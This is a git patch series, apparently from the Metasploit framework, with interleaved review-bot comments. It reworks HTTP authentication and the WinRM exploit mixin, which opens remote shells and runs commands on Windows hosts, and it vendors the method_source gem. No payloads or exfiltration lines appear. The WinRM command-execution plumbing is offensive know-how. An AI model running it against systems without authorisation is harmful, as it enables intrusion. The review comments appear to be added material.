- resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 
'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end + return if not datastore['USERNAME'] + datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 46bfffcc86..ba46142a45 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'pry' + module Rex module Proto module Http @@ -294,7 +296,7 @@ class Client # def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) - if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? + if res and res.code == 401 and res.headers['WWW-Authenticate'] res = send_auth(res, req.opts, t, persist) end res @@ -329,11 +331,6 @@ class Client conn.put(req.to_s) end - # Validates that the client has creds - def have_creds? - !(self.username.nil?) && self.username != '' - end - # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object 
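Review bot: The rewritten `basic_auth` never returns nil when no credentials are configured, because USERNAME now defaults to '' (options hunk earlier in this file) and `not ''` is false in Ruby, so callers receive the bogus auth string `":"`; the `|| ''` after `datastore['PASSWORD'].to_s` is also dead since `to_s` never yields nil. Suggested body: `return if datastore['USERNAME'].to_s.empty?` followed by `"#{datastore['USERNAME']}:#{datastore['PASSWORD']}"`. The header comment above it could then state the contract, e.g. `# Returns "user:pass", or nil when USERNAME is unset or empty`.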
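Review bot: `require 'pry'` at the top of lib/rex/proto/http/client.rb looks like a leftover debugging aid: nothing in the visible hunks uses Pry, and a hard require in the core HTTP client makes every consumer of it fail to load wherever the pry gem is absent, while pulling an interactive debugger into the library's runtime dependency set. Drop the line (and the blank line added with it).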
@@ -343,8 +340,23 @@ class Client # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) - opts['username'] ||= self.username - opts['password'] ||= self.password + if opts['username'].nil? or opts['username'] == '' + if self.username and not (self.username == '') + opts['username'] = self.username + else + opts['username'] = nil + end + end + + if opts['password'].nil? or opts['password'] == '' + if self.password and not (self.password == '') + opts['password'] = self.password + else + opts['password'] = nil + end + end + + return res if opts['username'].nil? or opts['username'] = '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] From ac6fdf24a28184531ae5c90a09ce251258f30416 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 22:01:43 -0600 Subject: [PATCH 032/139] Fix winrm mixin from revert merge --- lib/msf/core/exploit/winrm.rb | 117 ++++++---------------------------- 1 file changed, 20 insertions(+), 97 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 72b6a1f724..e61a29e5aa 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ module Exploit::Remote::WinRM c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + resp = send_winrm_request(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ module Exploit::Remote::WinRM end def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil 
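Review bot: `return res if opts['username'].nil? or opts['username'] = ''` uses assignment where a comparison was intended: whenever a username is present the right-hand side assigns '' (which is truthy), so the method returns the 401 response unconditionally and clobbers opts['username'] — no authentication is attempted after this change, and the `have_creds?` gate removed from send_recv in the previous hunk no longer protects anything. Fix the comparison, `return res if opts['username'].nil? || opts['username'] == ''`. The two nested nil-or-empty blocks above it can also collapse to `opts['username'] = self.username if opts['username'].to_s.empty?` and `opts['password'] = self.password if opts['password'].to_s.empty?`, with `return res if opts['username'].to_s.empty?` as the guard, which removes the `= nil` branches and the chance of repeating this slip.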
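Review bot: `c = connect(opts)` on the line above the changed call is now a dangling connection: the request goes through `send_winrm_request`, which builds its own client inside send_request_cgi, so the client in `c` is opened and never used here (the enclosing method starts and ends outside this hunk, so a later use of `c` is possible, but nothing visible suggests one). Unless `c` is read further down, remove that line. The value returned is now a single Response, or nil on EPIPE/timeout, rather than the old `[resp, c]` pair, so the rest of the method should be checked for a `return nil if resp.nil?` guard.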
@@ -76,17 +76,17 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end 
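Review bot: After the first `send_winrm_request` the later results are fed straight into `winrm_get_cmd_id`, `winrm_get_cmd_streams` and the terminate/delete calls with no nil check, but send_request_cgi (patched earlier on this page) swallows EPIPE and Timeout and returns nil, so a connection dropped mid-shell raises inside the parser instead of taking the `print_error` path that guards only the first call. Add `return nil if resp.nil?` after each intermediate request, in winrm_run_cmd_hanging (the next hunk) as well. `send_winrm_request(winrm_delete_shell_msg(shell_id))` is also the only call that omits `timeout`, silently falling back to the helper's 20-second default; pass `timeout` there for consistency.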
@@ -219,94 +219,6 @@ module Exploit::Remote::WinRM ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - })) - resp = 
c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def accepts_ntlm_auth parse_auth_methods(winrm_poke).include? "Negotiate" end @@ -329,6 +241,17 @@ module Exploit::Remote::WinRM return "/root/cimv2/" end + def send_winrm_request(data, timeout=20) + opts = { + 'uri' => datastore['URI'], + 'method' => 'POST', + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'ctype' => "application/soap+xml;charset=UTF-8" + } + send_request_cgi(opts,timeout) + end private From 6abbbeb3ca154776089b45c23624890b298e69b6 Mon Sep 17 00:00:00 2001 
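Review bot: `send_winrm_request` is undocumented although its nil-on-failure behaviour is what every caller in this mixin now depends on; suggest a YARD header such as `# Sends a WinRM SOAP envelope as an authenticated POST to datastore['URI'].` and `# @return [Rex::Proto::Http::Response, nil] nil if the connection drops or times out`, the nil path coming from send_request_cgi's bare rescue visible earlier on this page. The 'username' and 'password' values are copied from the datastore without `.to_s`, unlike the other call sites in this series, so a nil PASSWORD reaches the HTTP client unchanged; `'password' => datastore['PASSWORD'].to_s` would match them.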
From: David Maloney Date: Tue, 19 Feb 2013 22:17:25 -0600 Subject: [PATCH 033/139] put gemcache for methodsource back --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 ++ .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 + .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 + .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 +++ .../gems/method_source-0.7.1/README.markdown | 91 ++++++++++ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ++++++++ .../method_source-0.7.1/lib/method_source.rb | 163 ++++++++++++++++++ .../lib/method_source/source_location.rb | 138 +++++++++++++++ .../lib/method_source/version.rb | 3 + .../method_source-0.7.1/method_source.gemspec | 33 ++++ .../gems/method_source-0.7.1/test/test.rb | 122 +++++++++++++ .../method_source-0.7.1/test/test_helper.rb | 50 ++++++ 13 files changed, 721 insertions(+) create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml new file mode 100644 index 0000000000..ba51bba6b2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml @@ -0,0 +1,17 @@ +rvm: + - 1.8.7 + - 1.9.2 + - 1.9.3 + - ree + - rbx-18mode + - rbx-19mode + - jruby + +notifications: + irc: "irc.freenode.org#pry" + recipients: + - jrmair@gmail.com + +branches: + only: + - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts new file mode 100644 index 0000000000..a4e7838016 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts @@ -0,0 +1 @@ +-m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile new file mode 100644 index 0000000000..e45e65f871 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile @@ -0,0 +1,2 @@ +source :rubygems +gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE new file mode 100644 index 0000000000..d1a50d62d0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE 
@@ -0,0 +1,25 @@ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown new file mode 100644 index 0000000000..d91b810a3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown 
@@ -0,0 +1,91 @@ +method_source +============= + +(C) John Mair (banisterfiend) 2011 + +_retrieve the sourcecode for a method_ + +*NOTE:* This simply utilizes `Method#source_location`; it + does not access the live AST. + +`method_source` is a utility to return a method's sourcecode as a +Ruby string. Also returns `Proc` and `Lambda` sourcecode. + +Method comments can also be extracted using the `comment` method. + +It is written in pure Ruby (no C). + +* Some Ruby 1.8 support now available. +* Support for MRI, RBX, JRuby, REE + +`method_source` provides the `source` and `comment` methods to the `Method` and +`UnboundMethod` and `Proc` classes. + +* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` +* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) +* See the [source code](http://github.com/banister/method_source) + +Example: display method source +------------------------------ + + Set.instance_method(:merge).source.display + # => + def merge(enum) + if enum.instance_of?(self.class) + @hash.update(enum.instance_variable_get(:@hash)) + else + do_with_enum(enum) { |o| add(o) } + end + + self + end + +Example: display method comments +-------------------------------- + + Set.instance_method(:merge).comment.display + # => + # Merges the elements of the given enumerable object to the set and + # returns self. + +Limitations: +------------ + +* Occasional strange behaviour in Ruby 1.8 +* Cannot return source for C methods. +* Cannot return source for dynamically defined methods. + +Special Thanks +-------------- + +[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. + +[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. + +[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. 
+ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile new file mode 100644 index 0000000000..92c0234f3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile 
@@ -0,0 +1,76 @@ +dlext = Config::CONFIG['DLEXT'] +direc = File.dirname(__FILE__) + +require 'rake/clean' +require 'rake/gempackagetask' +require "#{direc}/lib/method_source/version" + +CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") +CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", + "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", + "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") + +def apply_spec_defaults(s) + s.name = "method_source" + s.summary = "retrieve the sourcecode for a method" + s.version = MethodSource::VERSION + s.date = Time.now.strftime '%Y-%m-%d' + s.author = "John Mair (banisterfiend)" + s.email = 'jrmair@gmail.com' + s.description = s.summary + s.require_path = 'lib' + + s.add_development_dependency("bacon","~>1.1.0") + s.add_development_dependency("rake", "~>0.9") + s.homepage = "http://banisterfiend.wordpress.com" + s.has_rdoc = 'yard' + s.files = `git ls-files`.split("\n") + s.test_files = `git ls-files -- test/*`.split("\n") +end + +task :test do + sh "bacon -q #{direc}/test/test.rb" +end + +desc "reinstall gem" +task :reinstall => :gems do + sh "gem uninstall method_source" rescue nil + sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" +end + +desc "Set up and run tests" +task :default => [:test] + +namespace :ruby do + spec = Gem::Specification.new do |s| + apply_spec_defaults(s) + s.platform = Gem::Platform::RUBY + end + + Rake::GemPackageTask.new(spec) do |pkg| + pkg.need_zip = false + pkg.need_tar = false + end + + desc "Generate gemspec file" + task :gemspec do + File.open("#{spec.name}.gemspec", "w") do |f| + f << spec.to_ruby + end + end +end + +desc "build all platform gems at once" +task :gems => [:rmgems, "ruby:gem"] + +desc "remove all platform gems" +task :rmgems => ["ruby:clobber_package"] + +desc "build and push latest gems" +task :pushgems => :gems do + chdir("#{direc}/pkg") do + Dir["*.gem"].each do |gemfile| + sh "gem push #{gemfile}" 
+ end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb new file mode 100644 index 0000000000..9a3c325f75 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb 
@@ -0,0 +1,163 @@ +# (C) John Mair (banisterfiend) 2011 +# MIT License + +direc = File.dirname(__FILE__) + +require "#{direc}/method_source/version" +require "#{direc}/method_source/source_location" + +module MethodSource + # Determine if a string of code is a valid Ruby expression. + # @param [String] code The code to validate. + # @return [Boolean] Whether or not the code is a valid Ruby expression. + # @example + # valid_expression?("class Hello") #=> false + # valid_expression?("class Hello; end") #=> true + def self.valid_expression?(str) + if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ + Rubinius::Melbourne19.parse_string(str) + elsif defined?(Rubinius::Melbourne) + Rubinius::Melbourne.parse_string(str) + else + catch(:valid) { + eval("BEGIN{throw :valid}\n#{str}") + } + end + true + rescue SyntaxError + false + end + + # Helper method responsible for extracting method body. + # Defined here to avoid polluting `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [File] The opened source file + def self.source_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + (line - 1).times { file.readline } + + code = "" + loop do + val = file.readline + code << val + + return code if valid_expression?(code) + end + end + end + + # Helper method responsible for opening source file and buffering up + # the comments for a specified method. Defined here to avoid polluting + # `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [String] The comments up to the point of the method. 
+ def self.comment_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + buffer = "" + (line - 1).times do + line = file.readline + # Add any line that is a valid ruby comment, + # but clear as soon as we hit a non comment line. + if (line =~ /^\s*#/) || (line =~ /^\s*$/) + buffer << line.lstrip + else + buffer.replace("") + end + end + + buffer + end + end + + # This module is to be included by `Method` and `UnboundMethod` and + # provides the `#source` functionality + module MethodExtensions + + # We use the included hook to patch Method#source on rubinius. + # We need to use the included hook as Rubinius defines a `source` + # on Method so including a module will have no effect (as it's + # higher up the MRO). + # @param [Class] klass The class that includes the module. + def self.included(klass) + if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && + RUBY_ENGINE =~ /rbx/ + + klass.class_eval do + orig_source = instance_method(:source) + + define_method(:source) do + begin + super + rescue + orig_source.bind(self).call + end + end + + end + end + end + + # Return the sourcecode for the method as a string + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method sourcecode as a string + # @example + # Set.instance_method(:clear).source.display + # => + # def clear + # @hash.clear + # self + # end + def source + if respond_to?(:source_location) + source = MethodSource.source_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !source + else + raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" + end + + source + end + + # Return the comments associated with the method as a string. 
+ # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method's comments as a string + # @example + # Set.instance_method(:clear).comment.display + # => + # # Removes all elements and returns self. + def comment + if respond_to?(:source_location) + comment = MethodSource.comment_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !comment + else + raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" + end + + comment + end + end +end + +class Method + include MethodSource::SourceLocation::MethodExtensions + include MethodSource::MethodExtensions +end + +class UnboundMethod + include MethodSource::SourceLocation::UnboundMethodExtensions + include MethodSource::MethodExtensions +end + +class Proc + include MethodSource::SourceLocation::ProcExtensions + include MethodSource::MethodExtensions +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb new file mode 100644 index 0000000000..9161854819 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb 
@@ -0,0 +1,138 @@ +module MethodSource + module ReeSourceLocation + # Ruby enterprise edition provides all the information that's + # needed, in a slightly different way. + def source_location + [__file__, __line__] rescue nil + end + end + + module SourceLocation + module MethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + else + + + def trace_func(event, file, line, id, binding, classname) + return unless event == 'call' + set_trace_func nil + + @file, @line = file, line + raise :found + end + + private :trace_func + + # Return the source location of a method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + if @file.nil? + args =[*(1..(arity<-1 ? -arity-1 : arity ))] + + set_trace_func method(:trace_func).to_proc + call(*args) rescue nil + set_trace_func nil + @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) + end + return [@file, @line] if File.exist?(@file.to_s) + end + end + end + + module ProcExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ + + # Return the source location for a Proc (Rubinius only) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + [block.file.to_s, block.line] + end + else + + # Return the source location for a Proc (in implementations + # without Proc#source_location) + # @return [Array] A two element array. 
First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + self.to_s =~ /@(.*):(\d+)/ + [$1, $2.to_i] + end + end + end + + module UnboundMethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + + else + + + # Return the source location of an instance method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + klass = case owner + when Class + owner + when Module + method_owner = owner + Class.new { include(method_owner) } + end + + # deal with immediate values + case + when klass == Symbol + return :a.method(name).source_location + when klass == Fixnum + return 0.method(name).source_location + when klass == TrueClass + return true.method(name).source_location + when klass == FalseClass + return false.method(name).source_location + when klass == NilClass + return nil.method(name).source_location + end + + begin + Object.instance_method(:method).bind(klass.allocate).call(name).source_location + rescue TypeError + + # Assume we are dealing 